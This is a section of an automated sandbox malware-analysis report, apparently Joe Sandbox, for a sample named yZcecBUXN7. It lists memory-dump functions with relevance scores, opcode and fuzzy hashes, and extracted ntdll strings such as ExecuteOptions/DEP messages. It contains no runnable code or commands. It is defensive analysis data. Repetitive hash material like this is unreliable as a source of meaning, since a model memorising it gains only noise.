                                                                                                      • Opcode ID: 489519f27e141c66b9631a70fe70e796b30935e391434cc40866fef289846524
                                                                                                      • Instruction ID: c9a868ab5721901ce2e2ea7d655d90d899395e73d7e8e2c220d9296d62d9510c
                                                                                                      • Opcode Fuzzy Hash: 489519f27e141c66b9631a70fe70e796b30935e391434cc40866fef289846524
                                                                                                      • Instruction Fuzzy Hash: 4590023120140442D24475999508646000597E0301F55D011B9125555EC76589916631
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67c356b0c2bc7695946ec3a5912ffdb8bf77cfd5c6ac80182188c1b325a34fbf
                                                                                                      • Instruction ID: b198bc6b1ac81a76394f101acb99e007b8ac0e2f0d9492ff00a07eb8cab39e1f
                                                                                                      • Opcode Fuzzy Hash: 67c356b0c2bc7695946ec3a5912ffdb8bf77cfd5c6ac80182188c1b325a34fbf
                                                                                                      • Instruction Fuzzy Hash: 6A90022160540442D28471599518706001597D0201F55D011B4125554DC7598B556BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7b201ab524538c255e6f7a8d089c72bb3ae6711c2dcf41a0d9399cd5a25b4dab
                                                                                                      • Instruction ID: c6aadf802e734d4e6b363f2d8557056abfacb722bb0c4de7eb94575a65eadb99
                                                                                                      • Opcode Fuzzy Hash: 7b201ab524538c255e6f7a8d089c72bb3ae6711c2dcf41a0d9399cd5a25b4dab
                                                                                                      • Instruction Fuzzy Hash: DA90043130140443D344715DD70C7070005D7D0301F55D411F453555CDD757CD517731
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2dd4812b0c3f56a2b9764ba945ec0018ad7ab40b65dda838f94125308db2378e
                                                                                                      • Instruction ID: 396767f888f28cb084607045fafc111d3011d524e5a59084607ac4cf72f0d03a
                                                                                                      • Opcode Fuzzy Hash: 2dd4812b0c3f56a2b9764ba945ec0018ad7ab40b65dda838f94125308db2378e
                                                                                                      • Instruction Fuzzy Hash: BC90026134140482D24471598514B060005D7E1301F55C015F5165554DC719CD526626
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142F60 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d33d6a5f24b2ef8da807b10e0b6de3e225cb3b1077258bceecef2bfabe55cd5e
                                                                                                      • Instruction ID: d73440d6a9ffb69fa44b0b41dc483e71118b1703360ffdf9d40cad9166a71dfe
                                                                                                      • Opcode Fuzzy Hash: d33d6a5f24b2ef8da807b10e0b6de3e225cb3b1077258bceecef2bfabe55cd5e
                                                                                                      • Instruction Fuzzy Hash: 0490026121140082D24871598504706004597E1201F55C012B6255554CC6298D615625
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142F90 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cb715fddcfbf12e476b20924c77611eda25f205acb606e383349a719ab007df4
                                                                                                      • Instruction ID: a8aeeea20942779b2cb745e65a4fdb90ddaccdf7f76e933ff9271b1eeffb0ea0
                                                                                                      • Opcode Fuzzy Hash: cb715fddcfbf12e476b20924c77611eda25f205acb606e383349a719ab007df4
                                                                                                      • Instruction Fuzzy Hash: BE90023120180442D2447159891470B000597D0302F55C011B5265555DC72589516A71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 63afd81fba74639d0492a0bcd7aad9af491cd6e0eb159b84ee76f0435b5b9f8d
                                                                                                      • Instruction ID: 1939bd4150b2e081c762025b04a3b126015e8ee568b5ee5ebd2388de3e673889
                                                                                                      • Opcode Fuzzy Hash: 63afd81fba74639d0492a0bcd7aad9af491cd6e0eb159b84ee76f0435b5b9f8d
                                                                                                      • Instruction Fuzzy Hash: 179002216014008242847169C9449064005BBE1211755C121B4A99550DC65989655B65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aca86ade46025868f38c0b2b24e5ddb7e083c8f44a69dec4e10a663ffd00d9da
                                                                                                      • Instruction ID: 08ab93ad939f61df3eb0ec46a2b34f87a3274d1666c47ff3827253742582ec8c
                                                                                                      • Opcode Fuzzy Hash: aca86ade46025868f38c0b2b24e5ddb7e083c8f44a69dec4e10a663ffd00d9da
                                                                                                      • Instruction Fuzzy Hash: B190023120180442D24471598908747000597D0302F55C011B9265555EC765C9916A31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b9ff61395e40d4dc17401cefda55e5874e4eae20893b1269503b8b5cebde49f4
                                                                                                      • Instruction ID: ab8329759e9f44ecd44d17e9f9b5f9427167d7a9ced3ee1a24774c220a54971f
                                                                                                      • Opcode Fuzzy Hash: b9ff61395e40d4dc17401cefda55e5874e4eae20893b1269503b8b5cebde49f4
                                                                                                      • Instruction Fuzzy Hash: 2B900221211C0082D34475698D14B07000597D0303F55C115B4255554CCA1589615A21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142E30 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d83b8e971b92eb5f0d2f41e0c12a50b5d2d0937a258a7005b25d3dd2a3269d8d
                                                                                                      • Instruction ID: c06cb44186a60812643bab7c3a28737653455fea1331d9402d5bbd67882a5681
                                                                                                      • Opcode Fuzzy Hash: d83b8e971b92eb5f0d2f41e0c12a50b5d2d0937a258a7005b25d3dd2a3269d8d
                                                                                                      • Instruction Fuzzy Hash: 7790022130140442D246715985146060009D7D1345F95C012F5525555DC7258A53A632
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142E80 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4aff97bb948975ee2324d2a0bd59e512b60a532fdcde1a937303d4481e0026cf
                                                                                                      • Instruction ID: b6de10238d41a75304dc2ec1a46b0de736a15c415c709fff7b455941c66ebb63
                                                                                                      • Opcode Fuzzy Hash: 4aff97bb948975ee2324d2a0bd59e512b60a532fdcde1a937303d4481e0026cf
                                                                                                      • Instruction Fuzzy Hash: 6190022160140542D24571598504616000A97D0241F95C022B5125555ECB258A92A631
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4711f94f9984e5a9b5a4246d9b0e20cb0b219764990ada7f50918ec06d5f4658
                                                                                                      • Instruction ID: 5d6a3441e414a4e4c55f0dc8982af58f86585b23ef9ef5742d25eba54bc4c03b
                                                                                                      • Opcode Fuzzy Hash: 4711f94f9984e5a9b5a4246d9b0e20cb0b219764990ada7f50918ec06d5f4658
                                                                                                      • Instruction Fuzzy Hash: D790027120140442D28471598504746000597D0301F55C011B9165554EC7598ED56B65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 557806072297851b67b7f1381cf75eb5d412c4b5f437e83f03b49c2a8d07fa95
                                                                                                      • Instruction ID: 95d9a0a0faa6a1761466a5f18414c51a6c9ea1fc1c0059d14f6a14b1de26f43a
                                                                                                      • Opcode Fuzzy Hash: 557806072297851b67b7f1381cf75eb5d412c4b5f437e83f03b49c2a8d07fa95
                                                                                                      • Instruction Fuzzy Hash: 6590026120180443D28475598904607000597D0302F55C011B6165555ECB298D516635
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01143010 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 31d8127e07027725c1e2f86fa58cd4fa1bd2a9bcd1b1e5e9d39aa6b888c1a090
                                                                                                      • Instruction ID: 8919e6f4564739e942c6d6d8480cb097cad5d9f1e9d392ba7baf544942104474
                                                                                                      • Opcode Fuzzy Hash: 31d8127e07027725c1e2f86fa58cd4fa1bd2a9bcd1b1e5e9d39aa6b888c1a090
                                                                                                      • Instruction Fuzzy Hash: F190022120184482D28472598904B0F410597E1202F95C019B8257554CCA1589555B21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01143090 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67548db5667262d7340767dabd670e694bb79a3144ea05f0c2232806d38927da
                                                                                                      • Instruction ID: 03ca3d4526d432cda6b6fbf3b1bef21d2c7992b8c7367f9471388c3da6188b40
                                                                                                      • Opcode Fuzzy Hash: 67548db5667262d7340767dabd670e694bb79a3144ea05f0c2232806d38927da
                                                                                                      • Instruction Fuzzy Hash: 6090022124140842D2847159C5147070006D7D0601F55C011B4125554DC7168A656BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011439B0 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6bfae05ecb8c1e4b20c7ef55aa4cc8b43e9b5e73a9bdba8eb60570299538d918
                                                                                                      • Instruction ID: b1d7b93b38f68974beded4e29cc287269dce8b692827e329286a1bc17c121b78
                                                                                                      • Opcode Fuzzy Hash: 6bfae05ecb8c1e4b20c7ef55aa4cc8b43e9b5e73a9bdba8eb60570299538d918
                                                                                                      • Instruction Fuzzy Hash: DD90022124545142D294715D85046164005B7E0201F55C021B4915594DC65589556721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01143D10 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c3dac78a2989cb8a47c8d408b0019caab0e9bbad4df4cd6961f186728cd5c801
                                                                                                      • Instruction ID: f3001ccabee9658fad213964d6916bac5d2698f27745fc03fba7d98a3b2ffc42
                                                                                                      • Opcode Fuzzy Hash: c3dac78a2989cb8a47c8d408b0019caab0e9bbad4df4cd6961f186728cd5c801
                                                                                                      • Instruction Fuzzy Hash: E490023120240182968472599904A4E410597E1302B95D415B4116554CCA1489615721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01143D70 Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b514e8486af6882acf54f6e088241e9d2459481fafba5421fe8e5768d350fa87
                                                                                                      • Instruction ID: eb58830634739aa2cb74c9932e13459a911b5db366df3f0b7d8c99649fd1f8b0
                                                                                                      • Opcode Fuzzy Hash: b514e8486af6882acf54f6e088241e9d2459481fafba5421fe8e5768d350fa87
                                                                                                      • Instruction Fuzzy Hash: 6190023520140442D65471599904646004697D0301F55D411B4525558DC75489A1A621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction ID: 95d71ea93b97971d4c628585624557967cba44245bbc6b0d2c6a21d630ac6304
                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                                                                      • Instruction ID: c4091470a68c1f0be83a02b88911ea8224b695ea767a7f823b6cc0dc5904f190
                                                                                                      • Opcode Fuzzy Hash: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                                                                      • Instruction Fuzzy Hash: 1451D7B5A00217BFDB29DB9CD89097EFBB8BF086407148229F5A5D7641E374DE408BA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: a1ed070df7852c554aed02d8740047bb5df098bd0810747054a3ccbf36ae01ff
                                                                                                      • Instruction ID: d953620f9b262c5c7ce61a39c2bd056c33141156cea1656f0471195d9b99b99d
                                                                                                      • Opcode Fuzzy Hash: a1ed070df7852c554aed02d8740047bb5df098bd0810747054a3ccbf36ae01ff
                                                                                                      • Instruction Fuzzy Hash: 4E51E571A04645AECB38DE9DC8D09FFBBF8EB48204B048459E5D6D7A41E7B8FA44C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01137630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Execute=1, xrefs: 01174713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011746FC
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01174742
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01174725
                                                                                                      • ExecuteOptions, xrefs: 011746A0
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01174787
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01174655
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: 8899e16a9543817fac7cb45126fd2ee974e0bf1696d54c63cb7e4d764bb20966
                                                                                                      • Instruction ID: 067e17d7990df78b5d3d03ae5473de7a4c6148cd307b3a15995640c56eaa52a8
                                                                                                      • Opcode Fuzzy Hash: 8899e16a9543817fac7cb45126fd2ee974e0bf1696d54c63cb7e4d764bb20966
                                                                                                      • Instruction Fuzzy Hash: 395139B1A0021A7BEF1DABA9DC99FA977B8EF54704F0400ADE605AB1C0D7709A41CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction ID: b11eb4ca5fd093620b883afa2a7339f26b08b246bca2c2ffa682382d94513044
                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction Fuzzy Hash: D3021671508342AFD709DF18C890A6FBBE5EFC8718F44892DFA894B264DB31E945CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0114B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction ID: fe0ebba4acb43aaa116725e86e7d04ba91347b08e6552120f6dc7bc0496cecd2
                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction Fuzzy Hash: 0B818D70A0924A9FEF2DCF6CC8917FEBBA2AF45B20F184159D861A72D1C734D8418B59
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 8a12ddf2b3566c786fc39c333225da38f5ed62bb37022ca87c7a2f6572a4fffb
                                                                                                      • Instruction ID: 7d8f5adf95a430735085d387e45cc4d502377805fb007f00a4216e1b3bfe311c
                                                                                                      • Opcode Fuzzy Hash: 8a12ddf2b3566c786fc39c333225da38f5ed62bb37022ca87c7a2f6572a4fffb
                                                                                                      • Instruction Fuzzy Hash: 8121777AA00119ABDB14DF79DC80AFEBBF8EF54654F04011AEE15D7200E730E9068BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0112F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 0117031E
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011702E7
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011702BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 6280860ce52b0dfdd55c097c1a234916f2a3d63614bd2e364b6610dbdcc446d2
                                                                                                      • Instruction ID: 5078296f426f8f9de4108b5daaaebbaa6c981b4cfffad1c03e9237fe069ea531
                                                                                                      • Opcode Fuzzy Hash: 6280860ce52b0dfdd55c097c1a234916f2a3d63614bd2e364b6610dbdcc446d2
                                                                                                      • Instruction Fuzzy Hash: CBE1AB316087529FD72DCF28C884B2ABBF0AB89724F144A2DF5A58B3D1D774D856CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
